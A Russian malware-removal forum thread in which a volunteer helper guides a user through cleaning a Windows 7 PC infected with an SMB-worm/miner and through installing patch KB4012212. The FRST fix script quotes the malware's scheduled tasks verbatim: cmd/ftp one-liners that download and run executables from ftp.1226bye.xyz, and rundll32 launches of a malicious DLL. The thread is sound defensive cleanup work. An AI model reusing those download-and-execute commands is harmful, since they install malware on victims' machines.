Сообщение "Возникла ошибка при запуске с\windows\debug\item.dat"

[Allexan]

Здравствуйте!
Прошу помощи в борьбе со зловредом.
Спасибо!

[Info_bot]

Уважаемый(ая) Allexan, спасибо за обращение на наш форум!

Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

[Vvvyg]

Обновления на систему не поставите - борьба будет вечной.

Выполните скрипт в AVZ:

Код:

begin
 TerminateProcessByName('c:\windows\mssecsvc.exe');
 QuarantineFile('c:\windows\mssecsvc.exe', '');
 DeleteFile('c:\windows\mssecsvc.exe', '');
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 2, true);
RebootWindows(true);
end.

Компьютер перезагрузится.

В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

Перетащите лог Check_Browsers_LNK.log из папки Autologger на утилиту ClearLNK. Отчёт о работе прикрепите.

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).

Загрузите, распакуйте на Рабочий стол и запустите SecurityCheck by glax24 & Severnyj.
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запуск от имени администратора (если Вы используете Windows Vista/7/8/10).
Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt.

Приложите этот файл к своему следующему сообщению.

[Allexan]

Обновления на систему не поставите - борьба будет вечной.

Спасибо. Будут установлены после лечения.

В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

Не удается.
Ошибка:

Результат загрузки
Ошибка загрузки. Данный файл уже был загружен.

Прикреплен во вложениях ( quarantine.zip )

Спасибо.

[Vvvyg]

Если карантин не грузится по назначению, т. е. по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме - не надо его крепить к сообщению, он просто пуст.

Остальное?

[Allexan]

Остальное?

В предыдущем сообщении не загрузились, хотя в личном кабинете отображались во вложениях.
Теперь загружены.

[Vvvyg]

Обновление, минимум одно, вот это придётся ставить в процессе лечения, иначе рецидив неизбежен, что и наблюдается.

Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:

Код:

CreateRestorePoint:
Closeprocesses:
(TODO: <公司名>) C:\Windows\Temp\conhost.exe
(www.google.com) C:\Windows\debug\lsmos.exe
GroupPolicy: Restriction - Chrome <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{84e50cd2-df36-46d5-910c-7b471f362c92} <==== ATTENTION (Restriction - IP)
CHR HKLM-x32\...\Chrome\Extension: [ablpcikjmhamjanpibkccdmpoekjigja] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [aminlpmkfcdibgpgfajlgnamicjckkjf] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fdjdjkkjoiomafnihnobkinnfjnnlhdg] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [gnoechjgbgjkimgdjcjcffhcgndpiabg] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [imkcicmjkjckajdecoehjnncefopolkl] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [jdkihdhlegcdggknokfekoemkjjnjhgi] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lbnlgonhigdaalgmmibbeakhfkpmigil] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [pchfckkccldkbclgdepkaonamkignanh] - hxxp://clients2.google.com/service/update2/crx
S2 mssecsvc2.1; C:\WINDOWS\mssecsvr.exe -m security [X]
Virustotal: C:\Windows\SysWOW64\Drivers\64.exe
Virustotal: C:\Windows\system32\v1.exe
Virustotal: C:\Windows\system32\upsupx.exe
Virustotal: C:\Windows\system32\u.exe
Virustotal: C:\Windows\qeriuwjhrf
2019-01-29 09:08 - 2019-01-29 23:20 - 000000080 _____ C:\Windows\system32\s
2019-01-29 09:08 - 2019-01-29 23:20 - 000000078 _____ C:\Windows\system32\ps
2019-01-29 09:08 - 2019-01-29 23:20 - 000000076 _____ C:\Windows\system32\p
2019-01-29 06:53 - 2019-01-29 23:23 - 000662528 _____ (Zhuhai Kingsoft Office Software Co.,Ltd) C:\Windows\SysWOW64\Drivers\64.exe
2019-01-29 06:53 - 2019-01-29 23:23 - 000003518 _____ C:\Windows\System32\Tasks\Mysa
2019-01-29 06:53 - 2019-01-29 23:23 - 000003504 _____ C:\Windows\System32\Tasks\Mysa3
2019-01-29 06:53 - 2019-01-29 23:23 - 000003424 _____ C:\Windows\System32\Tasks\Mysa2
2019-01-29 06:53 - 2019-01-29 23:23 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1
2019-01-29 06:53 - 2019-01-29 23:23 - 000003186 _____ C:\Windows\System32\Tasks\ok
2019-01-29 06:52 - 2019-01-29 06:52 - 000697744 _____ C:\Windows\system32\v1.exe
2019-01-29 06:52 - 2019-01-29 06:52 - 000221184 _____ (TODO: <公司名>) C:\Windows\system32\upsupx.exe
2019-01-29 06:52 - 2019-01-29 06:52 - 000037888 _____ (Orgs) C:\Windows\system32\u.exe
2019-01-29 06:25 - 2019-01-29 06:38 - 003514368 ____S C:\Windows\qeriuwjhrf
2019-01-27 11:46 - 2019-01-29 23:23 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat
C:\Windows\SysWOW64\scrobj.dll
C:\Windows\Temp\conhost.exe
C:\Windows\debug\lsmos.exe
C:\Windows\Temp\*.*
Task: {1602195B-679D-455B-9E4E-65ED15348FA9} - System32\Tasks\Mysa => cmd /c echo open ftp.1226bye.xyz>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
Task: {A0074E6C-3D0E-40BE-AE14-043904F26267} - System32\Tasks\Mysa3 => cmd /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
Task: {EDE596D2-0EE1-4D67-AD43-FD4F919F5319} - System32\Tasks\Mysa2 => cmd /c echo open ftp.1226bye.xyz>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
Task: {F20B2120-DB9D-49E5-A9FC-66FB9D024F78} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {FECC9A9C-4EBC-4877-81AB-5A44C831BBE9} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckyoumm4\"",Filter="__EventFilter.Name=\"fuckyoumm3\": <==== ATTENTION
WMI:subscription\__EventFilter->fuckyoumm3: <==== ATTENTION
FirewallRules: [TCP Query User{6CCCB871-DEE2-439B-A558-0513E22005FA}C:\program files (x86)\mirc\mirc.exe] => (Allow) C:\program files (x86)\mirc\mirc.exe No File
FirewallRules: [UDP Query User{D563E172-907C-48CC-8016-49C5E7E41FD6}C:\program files (x86)\mirc\mirc.exe] => (Allow) C:\program files (x86)\mirc\mirc.exe No File
FirewallRules: [{4BC6548D-C043-443B-8E72-696D37332F52}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe No File
FirewallRules: [{BF8A0F99-CF2E-492C-8B94-3F6481899012}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe No File
FirewallRules: [{196A500D-398D-45BA-9D53-2697D9484813}] => (Allow) C:\Program Files (x86)\Hearthstone\Hearthstone.exe No File
FirewallRules: [{1DEEF9B8-FF26-406C-BC7F-F3DAD3C34773}] => (Allow) C:\Program Files (x86)\Hearthstone\Hearthstone.exe No File
FirewallRules: [{CA380F18-17C6-461E-9586-3B76D1333C3B}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2880\Agent.exe No File
FirewallRules: [{FA2F0CF4-EADB-449E-83B9-7A87DEF378BD}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2880\Agent.exe No File
FirewallRules: [TCP Query User{88AA0036-191A-4623-AA85-31A24D000C05}C:\users\boris\appdata\local\temp\keygen.exe] => (Allow) C:\users\boris\appdata\local\temp\keygen.exe No File
FirewallRules: [UDP Query User{6C3086B8-D205-434C-A3A5-D7C6135461CB}C:\users\boris\appdata\local\temp\keygen.exe] => (Allow) C:\users\boris\appdata\local\temp\keygen.exe No File
FirewallRules: [TCP Query User{33292F7E-B2C6-4024-A757-F49460D59750}C:\hs\hearthstone\hearthstone.exe] => (Allow) C:\hs\hearthstone\hearthstone.exe No File
FirewallRules: [UDP Query User{31534FE0-2BD0-448E-99C7-D72D4A5DCDAF}C:\hs\hearthstone\hearthstone.exe] => (Allow) C:\hs\hearthstone\hearthstone.exe No File
FirewallRules: [{A0245617-E091-4F44-A064-48FA5CE0B820}] => (Block) LPort=445
FirewallRules: [{321FF512-75EA-437F-AB10-E3AD4DBFFDB4}] => (Block) LPort=139
Reboot:

и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. При сохранении выберите кодировку Юникод!
Отключите до перезагрузки антивирус, закройте все браузеры, в FRST нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Скачайте и запустите TDSSKiller: http://support.kaspersky.ru/viruses/disinfection/5350.
Файл C:\TDSSKiller.***_log.txt приложите в теме.
(где *** - версия программы, дата и время запуска.)
Если найдёт Rootkit.Boot.DarkGalaxy.* - лечите сразу.

После выполения всех пунктов, включая установку обновления сделайте новый лог FRST, будем дочищать.

[Allexan]

Обновление, минимум одно, вот это придётся ставить в процессе лечения, иначе рецидив неизбежен, что и наблюдается.

Обновление KB4012212 не устанавливается с ошибкой:

Обновление не применимо к этому компьютеру

Сервис пак установлен ( W7 Ultimate SP1 x64 )
Центр обновления перестал работать и выдает ошибку 8070422.
Починить пока не удается. Есть в сети подобные случаи выхода из строя центра обновления после инфицирования, решений нет.

Файл C:\TDSSKiller.***_log.txt приложите в теме.

Во вложении.

Если найдёт Rootkit.Boot.DarkGalaxy.* - лечите сразу.

Не нашел.

После выполения всех пунктов, включая установку обновления сделайте новый лог FRST, будем дочищать.

Во вложении.

СПАСИБО!!!!!

[Vvvyg]

Для контроля сделайте такой ещё лог.

Скачайте утилиту Universal Virus Sniffer отсюда и сделайте полный образ автозапуска uVS.
Если файл не влезет во вложения, загрузите в доступное облачное хранилище или на файлообменник без капчи и дайте ссылку.

Видимо, кривой дистрибутив 7-ки используете.

Скачайте Windows Repair (All In One), распакуйте, запустите, "Jump To Repairs", "Open Repairs", отметьте пункты:
14 "Remove Temp Files"
16 "Repair Windows Updates"
25 "Restore Important Windows Services"
26 "Set Windows Services To Default Startup"
и нажмите "Start Repairs".
После перезагрузки проверяйте работу обновления системы.

[Allexan]

Для контроля сделайте такой ещё лог.
Скачайте утилиту Universal Virus Sniffer отсюда и сделайте полный образ автозапуска uVS.

Во вложении.

Скачайте Windows Repair (All In One), распакуйте, запустите

Обновление работает. KB4012212 установлено.

На всякий случай, свежие логи Farbar Recovery Scan Tool во вложении.

Спасибо.

[Vvvyg]

Скопируйте скрипт ниже в буфер обмена (выделить и нажать Ctrl-C):

Код:

;uVS v4.1.2 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
regt 25
delref %Sys32%\DRIVERS\STAROPEN.SYS
delref %SystemDrive%\PROGRAM FILES (X86)\SAFERWEBB\A5OT4XO4VWCZJD.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\SAFERWEBB\A5OT4XO4VWCZJD.X64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\DISCOUNNTLEOCATOR\SVPLNCCGEKFU61.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\DISCOUNNTLEOCATOR\SVPLNCCGEKFU61.X64.DLL
delref %SystemRoot%\SYSWOW64\MACROMED\FLASH\FLASH32_32_0_0_114.OCX
delref %SystemDrive%\PROGRAM FILES\COMODO\COMODO INTERNET SECURITY\CMDAGENT.EXE
delref %SystemDrive%\USERS\BORIS\APPDATA\LOCAL\YANDEX\YANDEXBROWSER\APPLICATION\BROWSER.EXE
delref %SystemDrive%\USERS\BORIS\APPDATA\LOCAL\YANDEX\BROWSERMANAGER\BROWSERMANAGERSHOW.EXE
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\CHROME\APPLICATION\53.0.2785.116\INSTALLER\CHRMSTP.EXE
delref %SystemDrive%\USERS\BORIS\APPDATA\LOCAL\TEMP\HYD6E5C.TMP.1438248788\HTA\3RDPARTY\OCCOMSDK.DLL
delref {11111111-1111-1111-1111-110011501160}\[CLSID]
delref %SystemDrive%\USERS\BORIS\APPDATA\LOCAL\YANDEX\UPDATER\YUPDATE-EXECUTOR.EXE
delref %SystemDrive%\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\WINDOWS LIVE\WLIDNSP.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\COMMON FILES\MICROSOFT SHARED\WINDOWS LIVE\WLIDNSP.DLL
winsockreset
deldir C:\Windows\jNWhZ
del C:\Users\Boris\Desktop\Интернет.lnk
apply
deltmp
restart

Запустите файл start.exe из папки с uVS, выберите "Запустить под текущим пользователем", в главном меню программы - Скрипты -> выполнить скрипт из буфера обмена.
Компьютер перезагрузится.

В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его с своему сообщению.

[Allexan]

UVS будет лог выполнения скрипта

Во вложении.

[Vvvyg]

Всё на этом. Настоятельно рекомендую установить и прочие критические обновления, а лучше включить автоматическое обновление.

Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.

[Allexan]

Всё на этом. Настоятельно рекомендую установить и прочие критические обновления, а лучше включить автоматическое обновление.

Спасибо!